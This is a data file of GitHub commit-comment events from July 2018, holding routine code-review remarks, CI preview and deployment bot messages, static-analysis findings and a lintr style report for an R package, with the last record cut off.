{"id":"8006502921","type":"CommitCommentEvent","actor":{"login":"kml27"},"repo":{"name":"esaude/installer"},"payload":{"comment":{"id":29806109,"position":162,"line":571,"path":"makeself/install-esaude/install-eSaude.sh","commit_id":"01537d68772b044a1e52b14792af7eb1625ada11","created_at":"2018-07-23T21:21:41Z","updated_at":"2018-07-23T21:21:41Z","author_association":"COLLABORATOR","body":"Is 10 the number of lines for the empty database tables? should this be explicitly stated in a var name (or comment) or pulled from a container (in a reasonable amount of time) during the build?"}},"created_at":"2018-07-23T21:21:41Z"}
{"id":"8006503646","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29806110,"position":null,"line":null,"path":null,"commit_id":"1252adc6773c947ef42e7109dcac1d7c271fcc53","created_at":"2018-07-23T21:21:51Z","updated_at":"2018-07-23T21:21:51Z","author_association":"COLLABORATOR","body":"<h3>[Checkbox] better examples (#2715)</h3>\n\nPreview: <strong><a href='https://18833-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18833-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18833-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-23T21:21:51Z"}
{"id":"8006504827","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29806112,"position":null,"line":null,"path":null,"commit_id":"f557bc67d8fe48ddf45a15b65369152427398a58","created_at":"2018-07-23T21:22:08Z","updated_at":"2018-07-23T21:22:08Z","author_association":"COLLABORATOR","body":"<h3>external source maps in css-dist (#2710)</h3>\n\nPreview: <strong><a href='https://18834-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18834-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18834-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-23T21:22:08Z"}
{"id":"8006505692","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29806115,"position":null,"line":null,"path":null,"commit_id":"fa94459b669f75b130fb2b8748b0ab846750f604","created_at":"2018-07-23T21:22:19Z","updated_at":"2018-07-23T21:22:19Z","author_association":"COLLABORATOR","body":"<h3>[Checkbox] inline SVG background-image for icon (#2709)</h3>\n\nPreview: <strong><a href='https://18835-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://18835-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://18835-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-23T21:22:19Z"}
{"id":"8006536978","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29806161,"position":null,"line":null,"path":null,"commit_id":"f2baf05de58269a13a7b5db1c998e4fa7fd6fb08","created_at":"2018-07-23T21:29:20Z","updated_at":"2018-07-23T21:29:20Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loont](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loont).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loont-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-23T21:29:20Z"}
{"id":"8006537766","type":"CommitCommentEvent","actor":{"login":"kml27"},"repo":{"name":"esaude/installer"},"payload":{"comment":{"id":29806163,"position":5,"line":10,"path":"makeself/makeself.cmd","commit_id":"01537d68772b044a1e52b14792af7eb1625ada11","created_at":"2018-07-23T21:29:31Z","updated_at":"2018-07-23T21:29:31Z","author_association":"COLLABORATOR","body":"This is what I was mentioning I'd wait to work on... Do we want to show the Platform and POC versions here? I was considering changing __TOMCAT_VERSION__ outside of desc.json to $packaged_platform_version or similar and adding those to get_version.sh (where $latest_tomcat and $latest_poc would be written ```echo packaged_platform_version=$latest_tomcat >> get_version.sh``` during CI."}},"created_at":"2018-07-23T21:29:31Z"}
{"id":"8006538722","type":"CommitCommentEvent","actor":{"login":"dahlstrom-g"},"repo":{"name":"JetBrains/android"},"payload":{"comment":{"id":29806165,"position":null,"line":null,"path":null,"commit_id":"d13332c17c124a731b41e57783c146b36eac15da","created_at":"2018-07-23T21:29:44Z","updated_at":"2018-07-23T21:29:44Z","author_association":"CONTRIBUTOR","body":"This conflicts (semantically) with commit c58d016."}},"created_at":"2018-07-23T21:29:44Z"}
{"id":"8006540615","type":"CommitCommentEvent","actor":{"login":"rynld"},"repo":{"name":"Damian1724/Data-Structure"},"payload":{"comment":{"id":29806170,"position":null,"line":null,"path":null,"commit_id":"b775934fe6080bc146d9b503ae36b6c4dca6639e","created_at":"2018-07-23T21:30:11Z","updated_at":"2018-07-23T21:30:11Z","author_association":"NONE","body":"you can leave spaces between lines "}},"created_at":"2018-07-23T21:30:11Z"}
{"id":"8006540861","type":"CommitCommentEvent","actor":{"login":"esaude-ops"},"repo":{"name":"esaude/installer"},"payload":{"comment":{"id":29806173,"position":162,"line":571,"path":"makeself/install-esaude/install-eSaude.sh","commit_id":"01537d68772b044a1e52b14792af7eb1625ada11","created_at":"2018-07-23T21:30:13Z","updated_at":"2018-07-23T21:30:13Z","author_association":"MEMBER","body":"I just picked 10 at random.  Any OpenMRS installation with fewer than 10 tables cannot be complete."}},"created_at":"2018-07-23T21:30:13Z"}
{"id":"8006543647","type":"CommitCommentEvent","actor":{"login":"gspetrou"},"repo":{"name":"gspetrou/TerrortownTwo"},"payload":{"comment":{"id":29806181,"position":null,"line":null,"path":null,"commit_id":"3c2dd522fd4460131d73bbb4dad4b2e70b6e8448","created_at":"2018-07-23T21:30:50Z","updated_at":"2018-07-23T21:30:50Z","author_association":"OWNER","body":"BAN!!\r\n\r\n(Good call though)"}},"created_at":"2018-07-23T21:30:50Z"}
{"id":"8006543826","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"Kubecko/Marcin-Kubecko-kodilla-java"},"payload":{"comment":{"id":29806183,"position":25,"line":25,"path":"kodilla-hibernate/src/test/java/com/kodilla/hibernate/invoice/dao/InvoiceDaoTestSuite.java","commit_id":"45db806e643ede4419429bd6b36a74b5ac8a8517","created_at":"2018-07-23T21:30:52Z","updated_at":"2018-07-23T21:30:52Z","author_association":"NONE","body":"Product nie jest zapisywany"}},"created_at":"2018-07-23T21:30:52Z"}
{"id":"8006545787","type":"CommitCommentEvent","actor":{"login":"ADF-Repositry"},"repo":{"name":"ADF-Repositry/ADFGit"},"payload":{"comment":{"id":29806186,"position":null,"line":null,"path":null,"commit_id":"088410723e0c5c470fb5f0d4b462d40fd408938a","created_at":"2018-07-23T21:31:17Z","updated_at":"2018-07-23T21:31:17Z","author_association":"OWNER","body":"Commit"}},"created_at":"2018-07-23T21:31:17Z"}
{"id":"8006553382","type":"CommitCommentEvent","actor":{"login":"scchan"},"repo":{"name":"RadeonOpenCompute/hcc"},"payload":{"comment":{"id":29806202,"position":null,"line":null,"path":null,"commit_id":"614b056188fcf78a5db5a6e62dd34a051b140fa0","created_at":"2018-07-23T21:32:57Z","updated_at":"2018-07-23T21:32:57Z","author_association":"COLLABORATOR","body":"@pfultz2 I just fixed it, could you do a pull and try again?"}},"created_at":"2018-07-23T21:32:57Z"}
{"id":"8006554728","type":"CommitCommentEvent","actor":{"login":"vito"},"repo":{"name":"concourse/web"},"payload":{"comment":{"id":29806205,"position":4,"line":4,"path":"assets/css/typography.less","commit_id":"38047e0b52d7293ee481c49290258c7012c7a08d","created_at":"2018-07-23T21:33:15Z","updated_at":"2018-07-23T21:33:15Z","author_association":"MEMBER","body":"this shouldn't be removed - it was part of https://github.com/concourse/web/pull/2"}},"created_at":"2018-07-23T21:33:15Z"}
{"id":"8006556198","type":"CommitCommentEvent","actor":{"login":"jsibley"},"repo":{"name":"esaude/installer"},"payload":{"comment":{"id":29806208,"position":5,"line":10,"path":"makeself/makeself.cmd","commit_id":"01537d68772b044a1e52b14792af7eb1625ada11","created_at":"2018-07-23T21:33:35Z","updated_at":"2018-07-23T21:33:35Z","author_association":"CONTRIBUTOR","body":"I don't think the platform & POC versions are needed there."}},"created_at":"2018-07-23T21:33:35Z"}
{"id":"8006556586","type":"CommitCommentEvent","actor":{"login":"vito"},"repo":{"name":"concourse/web"},"payload":{"comment":{"id":29806210,"position":31,"line":26,"path":"assets/css/typography.less","commit_id":"38047e0b52d7293ee481c49290258c7012c7a08d","created_at":"2018-07-23T21:33:40Z","updated_at":"2018-07-23T21:33:40Z","author_association":"MEMBER","body":"same as above - this should be preserved, it's not meant to be a normal monospace font"}},"created_at":"2018-07-23T21:33:40Z"}
{"id":"8006557007","type":"CommitCommentEvent","actor":{"login":"vishalpatelbgm"},"repo":{"name":"watir/watir.github.io"},"payload":{"comment":{"id":29806213,"position":null,"line":null,"path":null,"commit_id":"e51a0af0c780a952aba53333144e0bf6451cc2d9","created_at":"2018-07-23T21:33:46Z","updated_at":"2018-07-23T21:33:46Z","author_association":"NONE","body":"Hi Titus. Thanks for merging this pending PR."}},"created_at":"2018-07-23T21:33:46Z"}
{"id":"8006557125","type":"CommitCommentEvent","actor":{"login":"friuns2"},"repo":{"name":"LordNoteworthy/al-khaser"},"payload":{"comment":{"id":29806214,"position":null,"line":null,"path":null,"commit_id":"eb5966737a32dca8f36d2c064802bb710e492fd8","created_at":"2018-07-23T21:33:48Z","updated_at":"2018-07-23T21:33:48Z","author_association":"NONE","body":"ah ok gonna try that "}},"created_at":"2018-07-23T21:33:48Z"}
{"id":"8006557264","type":"CommitCommentEvent","actor":{"login":"MeiGuddet"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29806215,"position":null,"line":null,"path":null,"commit_id":"380c7191c7db068e895a4c4c2ac84e806a05541f","created_at":"2018-07-23T21:33:49Z","updated_at":"2018-07-23T21:33:49Z","author_association":"COLLABORATOR","body":"`<string name=\"project_device_bs\">Mein Schwarzer Hai</string>`\r\nDas Mobiltelefon heißt Black Shark, bitte nicht übersetzen, das ist ja gruselig."}},"created_at":"2018-07-23T21:33:49Z"}
{"id":"8006557456","type":"CommitCommentEvent","actor":{"login":"Dharani11"},"repo":{"name":"Dharani11/proxy-re-encryption-"},"payload":{"comment":{"id":29806216,"position":null,"line":null,"path":null,"commit_id":"5d3addac2a7fe83e5cbd2634e2b0e74eca98d29b","created_at":"2018-07-23T21:33:52Z","updated_at":"2018-07-23T21:33:52Z","author_association":"OWNER","body":"mysql database"}},"created_at":"2018-07-23T21:33:52Z"}
{"id":"8006557459","type":"CommitCommentEvent","actor":{"login":"pawosm-arm"},"repo":{"name":"flang-compiler/f18"},"payload":{"comment":{"id":29806217,"position":null,"line":null,"path":null,"commit_id":"1000717da820d87b330719034281a69eaf37bb89","created_at":"2018-07-23T21:33:52Z","updated_at":"2018-07-23T21:33:52Z","author_association":"NONE","body":"True.\r\n"}},"created_at":"2018-07-23T21:33:52Z"}
{"id":"8006559734","type":"CommitCommentEvent","actor":{"login":"jsibley"},"repo":{"name":"esaude/installer"},"payload":{"comment":{"id":29806235,"position":162,"line":571,"path":"makeself/install-esaude/install-eSaude.sh","commit_id":"01537d68772b044a1e52b14792af7eb1625ada11","created_at":"2018-07-23T21:34:22Z","updated_at":"2018-07-23T21:34:22Z","author_association":"CONTRIBUTOR","body":"I just picked 10 at random.  Any OpenMRS instance with fewer than 10 tables cannot possibly be complete."}},"created_at":"2018-07-23T21:34:22Z"}
{"id":"8006560824","type":"CommitCommentEvent","actor":{"login":"titusfortner"},"repo":{"name":"watir/watir.github.io"},"payload":{"comment":{"id":29806236,"position":null,"line":null,"path":null,"commit_id":"e51a0af0c780a952aba53333144e0bf6451cc2d9","created_at":"2018-07-23T21:34:38Z","updated_at":"2018-07-23T21:34:38Z","author_association":"MEMBER","body":"Sorry it took too long. I've been completely ignoring all the PRs. It took a site redesign to make sure everything got added. Thanks!"}},"created_at":"2018-07-23T21:34:38Z"}
{"id":"8006571111","type":"CommitCommentEvent","actor":{"login":"chadfay"},"repo":{"name":"chadfay/github-pages-with-jekyll"},"payload":{"comment":{"id":29806258,"position":null,"line":null,"path":null,"commit_id":"07974b714c82a537c22e7c88acfc926a8392cc20","created_at":"2018-07-23T21:37:00Z","updated_at":"2018-07-23T21:37:00Z","author_association":"OWNER","body":"how do i commit this"}},"created_at":"2018-07-23T21:37:00Z"}
{"id":"8006574126","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":29806265,"position":31,"line":117,"path":"engines/xeen/item.cpp","commit_id":"0922d44199aa492cd57bc3fe1a40e0ff631e98ba","created_at":"2018-07-23T21:37:42Z","updated_at":"2018-07-23T21:37:42Z","author_association":"MEMBER","body":"Coverity complains here:\r\n\r\noverrun-local: Overrunning array of 51 8-byte elements at element index 60 (byte offset 480) by dereferencing pointer questItems + (id - QUEST_OFFSET + 35U + 14U + 11U).\r\n"}},"created_at":"2018-07-23T21:37:42Z"}
{"id":"8006578287","type":"CommitCommentEvent","actor":{"login":"MeiGuddet"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29806274,"position":null,"line":null,"path":null,"commit_id":"f22f3a1eaffb9a06fa8be7072277150f42ce2960","created_at":"2018-07-23T21:38:38Z","updated_at":"2018-07-23T21:38:38Z","author_association":"COLLABORATOR","body":"Hat aber jetzt eine andere Bedeutung."}},"created_at":"2018-07-23T21:38:38Z"}
{"id":"8006580608","type":"CommitCommentEvent","actor":{"login":"zaaraameera2014"},"repo":{"name":"aosp-mirror/platform_frameworks_base"},"payload":{"comment":{"id":29806276,"position":null,"line":null,"path":null,"commit_id":"36ce625ccfc6d484f95a3687e52bb31b40610c2d","created_at":"2018-07-23T21:39:11Z","updated_at":"2018-07-23T21:39:11Z","author_association":"NONE","body":"To it"}},"created_at":"2018-07-23T21:39:11Z"}
{"id":"8006580984","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29806278,"position":null,"line":null,"path":null,"commit_id":"42bcdf4fab8c2e77884e6ac5580fe5aa085151d0","created_at":"2018-07-23T21:39:16Z","updated_at":"2018-07-23T21:39:16Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-980](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-980).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-980-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-23T21:39:16Z"}
{"id":"8006583650","type":"CommitCommentEvent","actor":{"login":"pivotal-jamie-klassen"},"repo":{"name":"concourse/web"},"payload":{"comment":{"id":29806280,"position":4,"line":4,"path":"assets/css/typography.less","commit_id":"38047e0b52d7293ee481c49290258c7012c7a08d","created_at":"2018-07-23T21:39:53Z","updated_at":"2018-07-23T21:39:53Z","author_association":"CONTRIBUTOR","body":"ok, thanks for the insight. will fix now"}},"created_at":"2018-07-23T21:39:53Z"}
{"id":"8006584399","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29806282,"position":null,"line":null,"path":null,"commit_id":"d376b7ef1d3ce51273c132d22f41ea6b6b2a126e","created_at":"2018-07-23T21:40:03Z","updated_at":"2018-07-23T21:40:03Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-519](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-519).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-519-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-23T21:40:03Z"}
{"id":"8006585177","type":"CommitCommentEvent","actor":{"login":"justinba1010"},"repo":{"name":"justinba1010/Pen-Academy-Python"},"payload":{"comment":{"id":29806284,"position":4,"line":18,"path":"Critters/ReproductiveCritter.py","commit_id":"83c39baf3c99bb4d3046403aae14165b2c6b5586","created_at":"2018-07-23T21:40:13Z","updated_at":"2018-07-23T21:40:13Z","author_association":"OWNER","body":"Hey I don't think that works."}},"created_at":"2018-07-23T21:40:13Z"}
{"id":"8006597895","type":"CommitCommentEvent","actor":{"login":"DominicHolmes"},"repo":{"name":"holmesal/react-native-slider"},"payload":{"comment":{"id":29806310,"position":null,"line":null,"path":null,"commit_id":"5bf33404a2217c43c055d45f66372b898fc4fcd8","created_at":"2018-07-23T21:43:20Z","updated_at":"2018-07-23T21:43:20Z","author_association":"NONE","body":"i mailed it to your boston address"}},"created_at":"2018-07-23T21:43:20Z"}
{"id":"8006597948","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":29806311,"position":533,"line":642,"path":"engines/xeen/worldofxeen/darkside_cutscenes.cpp","commit_id":"a3c8840dcc867429872142deb80eb8d2181483f4","created_at":"2018-07-23T21:43:21Z","updated_at":"2018-07-23T21:43:21Z","author_association":"MEMBER","body":"vocIndex is always 2 here (see line 632). Perhaps 'vocIndex = 0' is missing on the line 635 similar to the line 482?\r\n\r\nSee CID 1386620"}},"created_at":"2018-07-23T21:43:21Z"}
{"id":"8006598112","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"cervols/think-a"},"payload":{"comment":{"id":29806313,"position":42,"line":39,"path":"part2/right_triangle.rb","commit_id":"2a09ccbe90a888ffb6ff4edd0e5424ad47174cf6","created_at":"2018-07-23T21:43:23Z","updated_at":"2018-07-23T21:43:23Z","author_association":"NONE","body":"Почти. Только в это условие мы никогда не зайдем. Потому-что прямоугольный треугольник никогда не будет равносторонним. Вместо проверки на то, что треугольник равносторонний, должна быть проверка на то, что треугольник равнобедренный, то есть, что катеты равны друг-другу."}},"created_at":"2018-07-23T21:43:23Z"}
{"id":"8006604863","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.core"},"payload":{"comment":{"id":29806329,"position":null,"line":null,"path":null,"commit_id":"84ac7ad58fbc85ae910ae6812fb8e63d67e47169","created_at":"2018-07-23T21:44:57Z","updated_at":"2018-07-23T21:44:57Z","author_association":"NONE","body":"[inst/examples/example_experiment.R:91:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/examples/example_experiment.R#L91) *style:* **Commented code should be removed.**\n```r\n​  # library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:92:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/examples/example_experiment.R#L92) *style:* **Commented code should be removed.**\n```r\n​  # beginCluster(20) # if you have multiple clusters available, use them here to save time\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:96:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/examples/example_experiment.R#L96) *style:* **Commented code should be removed.**\n```r\n​  # endCluster() # end the clusters\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_experiment.R:152:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/examples/example_experiment.R#L152) *style:* **Commented code should be removed.**\n```r\n​  # fires <- lapply(sims, function(x) x$landscape$fires) %>% stack\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:49:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/examples/example_POM.R#L49) *style:* **Commented code should be removed.**\n```r\n​  # cl <- makeCluster(detectCores() - 1) # not implemented yet in DEoptim\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:84:4:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/examples/example_POM.R#L84) *style:* **Commented code should be removed.**\n```r\n​  #stopCluster(cl) # not yet implemented, waiting for DEoptim\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:107:34:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/examples/example_POM.R#L107) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    params(sim1)$caribouMovement$N <- pars[2]\n                                 ^\n```\n[inst/examples/example_POM.R:114:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/examples/example_POM.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    nPattern_Out <- caribouFn(out$caribou)\n    ^~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:120:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/examples/example_POM.R#L120) *style:* **Commented code should be removed.**\n```r\n​    # cat(minimizeFn)\n      ^~~~~~~~~~~~~~~\n```\n[inst/examples/example_POM.R:121:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/examples/example_POM.R#L121) *style:* **Commented code should be removed.**\n```r\n​    # cat(\" \")\n      ^~~~~~~~\n```\n[inst/examples/example_POM.R:122:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/examples/example_POM.R#L122) *style:* **Commented code should be removed.**\n```r\n​    # cat(pars)\n      ^~~~~~~~~\n```\n[inst/examples/example_POM.R:123:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/examples/example_POM.R#L123) *style:* **Commented code should be removed.**\n```r\n​    # cat(\"\\n\")\n      ^~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/caribouMovement/caribouMovement.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:54:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/caribouMovement/caribouMovement.R#L54) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​doEvent.caribouMovement <- function(sim, eventTime, eventType, debug = FALSE) {\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:86:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/caribouMovement/caribouMovement.R#L86) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:95:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/caribouMovement/caribouMovement.R#L95) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.plotInterval, \"caribouMovement\", \"plot\", .last())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:102:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/caribouMovement/caribouMovement.R#L102) *style:* **Lines should not be more than 100 characters.**\n```r\n​      sim <- scheduleEvent(sim, time(sim) + P(sim)$.saveInterval, \"caribouMovement\", \"save\", .last() + 1)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:114:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/caribouMovement/caribouMovement.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Init <- function(sim) {\n^~~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:121:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/caribouMovement/caribouMovement.R#L121) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  N <- P(sim)$N\n  ^\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:122:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/caribouMovement/caribouMovement.R#L122) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  IDs <- as.character(1:N)\n  ^~~\n```\n[inst/sampleModules/caribouMovement/caribouMovement.R:138:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/caribouMovement/caribouMovement.R#L138) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​Move <- function(sim) {\n^~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:1:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L1) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​SpaDES.core.version <- \"0.1.0\"\n^~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:20:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L20) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Alex\", \"M\"), \"Chubaty\", email = \"alexander.chubaty@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:21:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L21) *style:* **Lines should not be more than 100 characters.**\n```r\n​    person(c(\"Eliot\", \"J\", \"B\"), \"McIntire\", email = \"eliot.mcintire@canada.ca\", role = c(\"aut\", \"cre\")),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:35:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L35) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"persistprob\", \"numeric\", 0.00, 0, 1, \"probability of fire persisting in a pixel\"),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/sampleModules/fireSpread/fireSpread.R:37:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/84ac7ad58fbc85ae910ae6812fb8e63d67e47169/inst/sampleModules/fireSpread/fireSpread.R#L37) *style:* **Lines should not be more than 100 characters.**\n```r\n​    defineParameter(\"spreadprob\", \"numeric\", 0.225, 0.05, 0.5, \"probability of fire spreading into a 